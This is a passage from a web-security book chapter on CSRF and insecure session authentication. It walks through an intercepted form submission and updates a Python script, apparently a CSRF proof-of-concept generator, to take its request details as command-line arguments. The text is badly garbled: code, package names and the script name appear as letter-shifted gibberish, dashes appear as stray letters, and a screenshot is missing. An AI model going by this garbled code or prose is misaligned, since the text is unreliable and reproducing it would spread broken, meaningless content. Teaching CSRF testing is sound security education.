CSRF and Insecure Session Authentication                                    Chapter 6

            OK, noting the important information d the HTTP request method, the form encoding, the
            field data, and so on d let's take a look at what happens when we turn Intercept off and
            allow the 1045 request to resolve:































            Here's what a successful submission looks like. Critically for us, we can see what value the
            form submitted through the success message.

            Let's feed this information into our DTSG@QPD@HFOFSBUPS QZ script, making a few small
            changes where our important variables are declared so that we can pass them as command-
            line arguments. With those changes, here's the new version of the top part of our script d
            notice the new TZT and BTU packages, and how we're using BTU to parse a text
            representation of a Python list into the actual data structure:

                   VTS CJO FOW QZUIPO
                JNQPSU TZT
                JNQPSU BTU

                GSPN CT  JNQPSU #FBVUJGVM4PVQ  5BH

                EFG HFOFSBUF@QPD
                    NFUIPE TZT BSHW< >
                    FODPEJOH@UZQF TZT BSHW< >
                    BDUJPO TZT BSHW< >
                    GJFMET   BTU MJUFSBM@FWBM TZT BSHW< >


                                                    [ 107 ]